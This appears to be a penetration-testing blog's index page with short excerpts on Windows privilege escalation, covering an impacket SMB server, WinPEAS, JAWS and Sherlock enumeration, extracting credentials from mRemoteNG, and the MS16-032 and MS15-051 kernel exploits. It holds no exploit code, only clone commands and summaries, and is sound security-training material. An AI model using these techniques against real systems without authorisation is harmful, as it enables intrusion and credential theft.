SMB server with Impaket-smbserver

This time we will set a SMB server to run script from using impaket-smbserver https://github.com/SecureAuthCorp/impacket Download 1. Download the scripts git clone https://github.com/SecureAuthCorp/impacket.git 2. locate the smbserver script find . -iname *smbserver* 2> /dev/null Note: I already have it installed in my Kali machine How to 1. In your Linux Read more…

WinPEAS – Windows Enum

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. This writing is about how to run it, and, complete Post-Exploitation activities How to 1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git cd privilege-escalation-awesome-scripts-suite 2. Navigate through the directories to find the binary Read more…

Exploiting mRemoteNG

mRemoteNG (mremote) is an open source project (https://github.com/rmcardle/mRemoteNG) that provides a full-featured, multi-tab remote connections manager. It currently supports RDP, SSH, Telnet, VNC, ICA, HTTP/S, rlogin, and raw socket connections. Additionally, It also provides the means to save connection settings such as hostnames, IP addresses, protocol, port, and user credentials, Read more…

How to enumerate Windows using JAWS

JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so ‘should’ run on every Windows version since Windows 7. https://github.com/411Hall/JAWS How to 1. Download the script git clone https://github.com/411Hall/JAWS.git cd JAWS ls 2. Read more…

Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) - 2016-0099

Microsoft Windows could allow a local authenticated attacker to gain elevated privileges on the system, caused by improper sanitization of handles in memory by the Secondary Logon Service. By executing a specially-crafted program, an authenticated attacker could exploit this vulnerability to execute arbitrary code as an administrator and take control Read more…

Sherlock – Find missing Windows patches for Local Privilege Escalation

Sherlock is a Powershell script used to privilege escalation, quickly finding vulnerabilities in the system. (https://github.com/rasta-mouse/Sherlock) Currently looks for: MS10-015 : User Mode to Ring (KiTrap0D) MS10-092 : Task Scheduler MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow MS13-081 : TrackPopupMenuEx Win32k NULL Page MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference Read more…

Windows Exploit MS15-051 – CVE-2015-1701 – Privilege Escalation

This vulnerability exploit windows kernel vulnerability that leads to privilege escalation. Vulnerable: Microsoft Windows Vista Service Pack 2 0 Microsoft Windows Server 2008 for x64-based Systems SP2 Microsoft Windows Server 2008 for Itanium-based Systems SP2 Microsoft Windows Server 2008 for 32-bit Systems SP2 Microsoft Windows Server 2003 Itanium SP2 Microsoft Read more…